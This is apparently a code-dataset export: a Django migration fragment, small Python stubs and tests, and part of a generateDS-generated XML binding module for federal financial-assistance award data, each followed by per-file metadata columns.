            field=models.DateField(help_text='Date of termination of connection between the person and this company', null=True, verbose_name='connection`s end date'),
        ),
        migrations.AlterField(
            model_name='companylinkwithpep',
            name='start_date',
            field=models.DateField(help_text="Date of the beginning of the person's connection with the company.", null=True, verbose_name='connection`s start date'),
        ),
        # The same help_text/verbose_name is applied to both the live model
        # and its django-simple-history style 'historical' counterpart.
        migrations.AlterField(
            model_name='historicalpep',
            name='termination_date',
            field=models.DateField(help_text='PEP status termination date in YYYY-MM-DD format.', null=True, verbose_name='PEP status termination date '),
        ),
        migrations.AlterField(
            model_name='pep',
            name='termination_date',
            field=models.DateField(help_text='PEP status termination date in YYYY-MM-DD format.', null=True, verbose_name='PEP status termination date '),
        ),
        migrations.AlterField(
            model_name='relatedpersonslink',
            name='confirmation_date',
            field=models.DateField(help_text='Date of confirmation of connection in the "Anti-Corruption Action Center" database.', null=True, verbose_name='connection`s confirmation date'),
        ),
        migrations.AlterField(
            model_name='relatedpersonslink',
            name='end_date',
            field=models.DateField(help_text='The date the relationship ends.', null=True, verbose_name='connection`s end date'),
        ),
        migrations.AlterField(
            model_name='relatedpersonslink',
            name='start_date',
            field=models.DateField(help_text='Date of the beginning of the relationship.', null=True, verbose_name='connection`s start date'),
        ),
    ]
| 46.111111
| 190
| 0.651807
| 275
| 2,490
| 5.770909
| 0.254545
| 0.100819
| 0.126024
| 0.146188
| 0.821676
| 0.803403
| 0.773787
| 0.708255
| 0.606175
| 0.606175
| 0
| 0.016481
| 0.244578
| 2,490
| 53
| 191
| 46.981132
| 0.82722
| 0.018072
| 0
| 0.723404
| 1
| 0
| 0.386001
| 0.009415
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb1f3a458254fb01557ef2a46a6e3a0819eb2536
| 77
|
py
|
Python
|
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.6
from lock import User
from lock import Credentials
| 15.4
| 28
| 0.779221
| 13
| 77
| 4.615385
| 0.769231
| 0.266667
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.142857
| 77
| 4
| 29
| 19.25
| 0.878788
| 0.298701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb2af825639e61a0c87e2adb12e101fccfdc318d
| 61
|
py
|
Python
|
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | 7
|
2021-06-08T10:24:19.000Z
|
2022-02-02T11:57:56.000Z
|
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | null | null | null |
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | null | null | null |
import streamlit as st
def run_text_modeling():
    """Placeholder page handler: the text-modeling example is not implemented."""
    return None
| 10.166667
| 24
| 0.737705
| 9
| 61
| 4.777778
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.213115
| 61
| 5
| 25
| 12.2
| 0.895833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cb30b7fa0113b5a568746307cf11476c5ac54f19
| 195
|
py
|
Python
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | 2
|
2021-04-21T13:53:16.000Z
|
2021-08-24T16:51:16.000Z
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | 5
|
2021-03-14T16:31:41.000Z
|
2021-07-02T09:00:31.000Z
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | null | null | null |
from datagen import logging_handler
def test_logging_handler():
    """Exercise both logging modes purely for coverage."""
    for mode in ('debug', 'off'):
        logging_handler.configure_logging(mode)
| 24.375
| 47
| 0.728205
| 22
| 195
| 6.136364
| 0.590909
| 0.414815
| 0.340741
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174359
| 195
| 7
| 48
| 27.857143
| 0.838509
| 0.087179
| 0
| 0
| 0
| 0
| 0.04908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb46d63c4b0b8d3577e3cc0ee39f43a7bd78616b
| 614,443
|
py
|
Python
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 24
|
2015-06-16T17:29:30.000Z
|
2022-02-15T14:31:34.000Z
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 112
|
2015-06-16T18:30:32.000Z
|
2016-02-18T21:53:47.000Z
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 11
|
2015-06-17T03:23:25.000Z
|
2021-02-17T11:07:19.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated by generateDS.py.
#
# Command line options:
# ('-o', 'finassist.py')
# ('-q', '')
# ('-f', '')
# ('--no-dates', '')
# ('--no-versions', '')
#
# Command line arguments:
# ../schema/xbrl/finassist/da-finassist-content-2015-06-29.xsd
#
# Command line:
# /Users/rebeccasweger/Dev/.virtualenvs/intercessor/lib/python2.7/site-packages/generateDS-2.17a0/generateDS.py -o "finassist.py" -q -f --no-dates --no-versions ../schema/xbrl/finassist/da-finassist-content-2015-06-29.xsd
#
# Current working directory (os.getcwd()):
# mappings
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
from lxml import etree as etree_
# Module-level switch; presumably enables validation of simple-type values
# in the generated parse code - not referenced within this chunk.
# TODO(review): confirm against the generated classes further down the file.
Validate_simpletypes_ = True
def parsexml_(infile, parser=None, **kwargs):
    """Parse *infile* with lxml and return the document tree.

    When no parser is supplied, the ElementTree-compatible lxml parser is
    used so that, e.g., comments are ignored.
    """
    chosen = parser
    if chosen is None:
        chosen = etree_.ETCompatXMLParser()
    return etree_.parse(infile, parser=chosen, **kwargs)
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
# Prefer a user-supplied GeneratedsSuper (module generatedssuper); fall back
# to the bundled implementation below when it is not importable.
try:
    from generatedssuper import GeneratedsSuper
except ImportError as exp:

    class GeneratedsSuper(object):
        """Fallback base class for the generated binding classes: supplies
        the gds_format_* / gds_validate_* / gds_parse_* helpers for simple
        XSD types, plus node-path and dynamic-class utilities."""
        # Matches a trailing ISO 8601 timezone offset such as +05:30 / -14:00.
        tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')

        class _FixedOffsetTZ(datetime_.tzinfo):
            # Minimal fixed-offset tzinfo (offset given in minutes).
            def __init__(self, offset, name):
                self.__offset = datetime_.timedelta(minutes=offset)
                self.__name = name
            def utcoffset(self, dt):
                return self.__offset
            def tzname(self, dt):
                return self.__name
            def dst(self, dt):
                return None

        # --- formatting / validation helpers for simple XSD types ---
        def gds_format_string(self, input_data, input_name=''):
            return input_data
        def gds_validate_string(self, input_data, node=None, input_name=''):
            if not input_data:
                return ''
            else:
                return input_data
        def gds_format_base64(self, input_data, input_name=''):
            return base64.b64encode(input_data)
        def gds_validate_base64(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            return '%d' % input_data
        def gds_validate_integer(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_integer_list(self, input_data, input_name=''):
            return '%s' % ' '.join(input_data)
        def gds_validate_integer_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    int(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of integers')
            return values
        def gds_format_float(self, input_data, input_name=''):
            return ('%.15f' % input_data).rstrip('0')
        def gds_validate_float(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_float_list(self, input_data, input_name=''):
            return '%s' % ' '.join(input_data)
        def gds_validate_float_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of floats')
            return values
        def gds_format_double(self, input_data, input_name=''):
            return '%e' % input_data
        def gds_validate_double(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_double_list(self, input_data, input_name=''):
            return '%s' % ' '.join(input_data)
        def gds_validate_double_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                try:
                    float(value)
                except (TypeError, ValueError):
                    raise_parse_error(node, 'Requires sequence of doubles')
            return values
        def gds_format_boolean(self, input_data, input_name=''):
            return ('%s' % input_data).lower()
        def gds_validate_boolean(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_boolean_list(self, input_data, input_name=''):
            return '%s' % ' '.join(input_data)
        def gds_validate_boolean_list(
                self, input_data, node=None, input_name=''):
            values = input_data.split()
            for value in values:
                if value not in ('true', '1', 'false', '0', ):
                    raise_parse_error(
                        node,
                        'Requires sequence of booleans '
                        '("true", "1", "false", "0")')
            return values

        # --- date/time formatting and parsing (ISO 8601, optional TZ) ---
        def gds_validate_datetime(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_datetime(self, input_data, input_name=''):
            if input_data.microsecond == 0:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        @classmethod
        def gds_parse_datetime(cls, input_data):
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            time_parts = input_data.split('.')
            if len(time_parts) > 1:
                micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
                input_data = '%s.%s' % (time_parts[0], micro_seconds, )
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt
        def gds_validate_date(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_date(self, input_data, input_name=''):
            _svalue = '%04d-%02d-%02d' % (
                input_data.year,
                input_data.month,
                input_data.day,
            )
            try:
                if input_data.tzinfo is not None:
                    tzoff = input_data.tzinfo.utcoffset(input_data)
                    if tzoff is not None:
                        total_seconds = tzoff.seconds + (86400 * tzoff.days)
                        if total_seconds == 0:
                            _svalue += 'Z'
                        else:
                            if total_seconds < 0:
                                _svalue += '-'
                                total_seconds *= -1
                            else:
                                _svalue += '+'
                            hours = total_seconds // 3600
                            minutes = (total_seconds - (hours * 3600)) // 60
                            _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            except AttributeError:
                pass
            return _svalue
        @classmethod
        def gds_parse_date(cls, input_data):
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
            dt = dt.replace(tzinfo=tz)
            return dt.date()
        def gds_validate_time(self, input_data, node=None, input_name=''):
            return input_data
        def gds_format_time(self, input_data, input_name=''):
            if input_data.microsecond == 0:
                _svalue = '%02d:%02d:%02d' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%02d:%02d:%02d.%s' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        def gds_validate_simple_patterns(self, patterns, target):
            # pat is a list of lists of strings/patterns. We should:
            # - AND the outer elements
            # - OR the inner elements
            found1 = True
            for patterns1 in patterns:
                found2 = False
                for patterns2 in patterns1:
                    if re_.search(patterns2, target) is not None:
                        found2 = True
                        break
                if not found2:
                    found1 = False
                    break
            return found1
        @classmethod
        def gds_parse_time(cls, input_data):
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            if len(input_data.split('.')) > 1:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt.time()
        def gds_str_lower(self, instring):
            return instring.lower()

        # --- node path and dynamic class helpers ---
        def get_path_(self, node):
            # Build a '/'-separated path of tag names from the root to node.
            path_list = []
            self.get_path_list_(node, path_list)
            path_list.reverse()
            path = '/'.join(path_list)
            return path
        # Strips the '{namespace}' prefix from an lxml tag name.
        Tag_strip_pattern_ = re_.compile(r'\{.*\}')
        def get_path_list_(self, node, path_list):
            if node is None:
                return
            tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
            if tag:
                path_list.append(tag)
            self.get_path_list_(node.getparent(), path_list)
        def get_class_obj_(self, node, default_class=None):
            # Resolve an xsi:type attribute to a class in this module,
            # falling back to default_class when absent or unknown.
            class_obj1 = default_class
            if 'xsi' in node.nsmap:
                classname = node.get('{%s}type' % node.nsmap['xsi'])
                if classname is not None:
                    names = classname.split(':')
                    if len(names) == 2:
                        classname = names[1]
                    class_obj2 = globals().get(classname)
                    if class_obj2 is not None:
                        class_obj1 = class_obj2
            return class_obj1
        def gds_build_any(self, node, type_name=None):
            return None
        @classmethod
        def gds_reverse_node_mapping(cls, mapping):
            # NOTE: iteritems() is Python 2 only (this file is generated
            # for Python 2.7).
            return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
# Default output encoding name; presumably consumed by the generated export
# code - not referenced within this chunk.
ExternalEncoding = 'ascii'
# Splits an lxml tag into an optional '{namespace}' part and the local name.
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
# Matches runs of whitespace (newlines, carriage returns, spaces).
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
# Captures the namespace URI and local name from a '{uri}name' tag.
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
# Matches a complete CDATA section, including across newlines (DOTALL).
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
    """Write four spaces per *level* to *outfile* when pretty-printing."""
    if not pretty_print:
        return
    outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape XML markup characters, leaving CDATA sections untouched."""
    if not inStr:
        return ''
    # Coerce non-string input to its string form (Python 2 and/or idiom).
    text = isinstance(inStr, basestring) and inStr or '%s' % inStr
    pieces = []
    cursor = 0
    for match in CDATA_pattern_.finditer(text):
        # Escape the run before each CDATA section; keep the section verbatim.
        pieces.append(quote_xml_aux(text[cursor:match.start()]))
        pieces.append(text[match.start():match.end()])
        cursor = match.end()
    pieces.append(quote_xml_aux(text[cursor:]))
    return ''.join(pieces)
def quote_xml_aux(inStr):
    """Escape the XML special characters '&', '<' and '>' in *inStr*.

    NOTE(review): the original body replaced each character with itself
    (the entity references were evidently stripped by an HTML-unescaping
    pass over this file), making the function a no-op that produced
    invalid XML.  The standard entity replacements are restored here.
    """
    # '&' must be escaped first so it does not re-escape the entities below.
    s1 = inStr.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* for use as an XML attribute value and wrap it in quotes.

    NOTE(review): the original replacements and the double-quote entity were
    corrupted (evidently by an HTML-unescaping pass) - one line was not even
    valid Python.  The standard generateDS escaping is restored here:
    '&', '<', '>' become entities; a value containing double quotes is
    single-quoted, unless it also contains single quotes, in which case
    the double quotes are entity-escaped.
    """
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Return *inStr* rendered as a Python string literal, choosing single,
    double, or triple quoting so embedded quotes need minimal escaping."""
    text = inStr
    if text.find("'") == -1:
        # No single quotes: single-quoted literal, tripled when multi-line.
        template = "'''%s'''" if text.find('\n') != -1 else "'%s'"
        return template % text
    # Contains single quotes: fall back to double quoting, escaping any
    # embedded double quotes; tripled when multi-line.
    if text.find('"') != -1:
        text = text.replace('"', '\\"')
    template = '"""%s"""' if text.find('\n') != -1 else '"%s"'
    return template % text
def get_all_text_(node):
    """Concatenate a node's leading text with the tail text of each child."""
    parts = []
    if node.text is not None:
        parts.append(node.text)
    for child in node:
        if child.tail is not None:
            parts.append(child.tail)
    return ''.join(parts)
def find_attr_value_(attr_name, node):
    """Look up an attribute on *node*, resolving an optional 'prefix:name'
    namespace prefix via node.nsmap.  Returns None when absent."""
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        # Unprefixed attribute: plain lookup.
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, local = parts
        uri = node.nsmap.get(prefix)
        if uri is not None:
            # lxml stores namespaced attributes in Clark notation: {uri}name.
            return attrs.get('{%s}%s' % (uri, local, ))
    return None
class GDSParseError(Exception):
    """Raised (via raise_parse_error) for XML content that fails parsing
    or validation."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError with *msg* annotated with the offending node's
    tag name and source line number."""
    detail = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
    raise GDSParseError(detail)
class MixedContainer:
    """Holds one piece of mixed XML content - plain text, a simple-typed
    value, or a nested complex object - and knows how to export itself as
    XML text, as an lxml etree node, or as a Python literal."""
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7
    TypeBase64 = 8
    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value
    def getCategory(self):
        return self.category
    def getContenttype(self, content_type):
        # NOTE(review): the content_type parameter is ignored; the stored
        # value is always returned.
        return self.content_type
    def getValue(self):
        return self.value
    def getName(self):
        return self.name
    def export(self, outfile, level, name, namespace, pretty_print=True):
        """Write this content to *outfile* as XML text."""
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace, name, pretty_print)
    def exportSimple(self, outfile, level, name):
        """Write a simple-typed value as <name>value</name>, formatting the
        value according to its content_type."""
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeBase64:
            outfile.write('<%s>%s</%s>' % (
                self.name, base64.b64encode(self.value), self.name))
    def to_etree(self, element):
        """Attach this content to lxml *element*, placing text either as the
        parent's text or as the tail of the last child, per lxml's model."""
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                if len(element) > 0:
                    if element[-1].tail is None:
                        element[-1].tail = self.value
                    else:
                        element[-1].tail += self.value
                else:
                    if element.text is None:
                        element.text = self.value
                    else:
                        element.text += self.value
        elif self.category == MixedContainer.CategorySimple:
            subelement = etree_.SubElement(element, '%s' % self.name)
            subelement.text = self.to_etree_simple()
        else:    # category == MixedContainer.CategoryComplex
            self.value.to_etree(element)
    def to_etree_simple(self):
        """Return the simple-typed value formatted per its content_type."""
        if self.content_type == MixedContainer.TypeString:
            text = self.value
        elif (self.content_type == MixedContainer.TypeInteger or
                self.content_type == MixedContainer.TypeBoolean):
            text = '%d' % self.value
        elif (self.content_type == MixedContainer.TypeFloat or
                self.content_type == MixedContainer.TypeDecimal):
            text = '%f' % self.value
        elif self.content_type == MixedContainer.TypeDouble:
            text = '%g' % self.value
        elif self.content_type == MixedContainer.TypeBase64:
            text = '%s' % base64.b64encode(self.value)
        return text
    def exportLiteral(self, outfile, level, name):
        """Write this content as a Python constructor-call literal."""
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s",\n' % (
                    self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Descriptor for one member of a generated class: its name, its XSD
    data type (or chain of types), and a container flag."""

    def __init__(self, name='', data_type='', container=0):
        self.name = name
        self.data_type = data_type
        self.container = container

    def set_name(self, name):
        self.name = name

    def get_name(self):
        return self.name

    def set_data_type(self, data_type):
        self.data_type = data_type

    def get_data_type_chain(self):
        return self.data_type

    def get_data_type(self):
        """Return the effective type: the last element of a type chain,
        'xs:string' for an empty chain, or the single type itself."""
        if not isinstance(self.data_type, list):
            return self.data_type
        return self.data_type[-1] if self.data_type else 'xs:string'

    def set_container(self, container):
        self.container = container

    def get_container(self):
        return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class awardComplexType(GeneratedsSuper):
    """Generated binding for the XML Schema complex type ``awardComplexType``
    (finassist namespace).

    Holds the child elements of an award record (description, IDs,
    record/action/transaction types, awardee info, place and period of
    performance, repeating agency lists, CFDA program, amounts) plus an
    optional ``id`` attribute, and provides XML export and
    build-from-etree-node methods.
    """
    # ``subclass`` lets an application override which class factory() builds.
    subclass = None
    superclass = None
    def __init__(self, id=None, awardDescription=None, awardID=None, parentAwardID=None, modificationAmendmentNumber=None, recordType=None, typeOfAction=None, typeOfTransactionCode=None, awardeeInformation=None, primaryPlaceOfPerformance=None, periodOfPerformance=None, awardingAgency=None, fundingAgency=None, awardingSubTierAgency=None, fundingSubTierAgency=None, highlyCompensatedOfficer=None, catalogOfFederalDomesticAssistanceProgram=None, awardAmounts=None):
        """Store the id attribute and all child members; repeating members
        default to fresh empty lists."""
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.awardDescription = awardDescription
        self.awardID = awardID
        self.parentAwardID = parentAwardID
        self.modificationAmendmentNumber = modificationAmendmentNumber
        self.recordType = recordType
        self.typeOfAction = typeOfAction
        self.typeOfTransactionCode = typeOfTransactionCode
        self.awardeeInformation = awardeeInformation
        self.primaryPlaceOfPerformance = primaryPlaceOfPerformance
        self.periodOfPerformance = periodOfPerformance
        # Repeating children get a fresh list per instance (avoids the
        # shared-mutable-default pitfall).
        if awardingAgency is None:
            self.awardingAgency = []
        else:
            self.awardingAgency = awardingAgency
        if fundingAgency is None:
            self.fundingAgency = []
        else:
            self.fundingAgency = fundingAgency
        if awardingSubTierAgency is None:
            self.awardingSubTierAgency = []
        else:
            self.awardingSubTierAgency = awardingSubTierAgency
        if fundingSubTierAgency is None:
            self.fundingSubTierAgency = []
        else:
            self.fundingSubTierAgency = fundingSubTierAgency
        if highlyCompensatedOfficer is None:
            self.highlyCompensatedOfficer = []
        else:
            self.highlyCompensatedOfficer = highlyCompensatedOfficer
        self.catalogOfFederalDomesticAssistanceProgram = catalogOfFederalDomesticAssistanceProgram
        self.awardAmounts = awardAmounts
    def factory(*args_, **kwargs_):
        """Build an instance, honoring a registered ``subclass`` override."""
        if awardComplexType.subclass:
            return awardComplexType.subclass(*args_, **kwargs_)
        else:
            return awardComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter (and list add/insert/replace) accessors.
    def get_awardDescription(self): return self.awardDescription
    def set_awardDescription(self, awardDescription): self.awardDescription = awardDescription
    def get_awardID(self): return self.awardID
    def set_awardID(self, awardID): self.awardID = awardID
    def get_parentAwardID(self): return self.parentAwardID
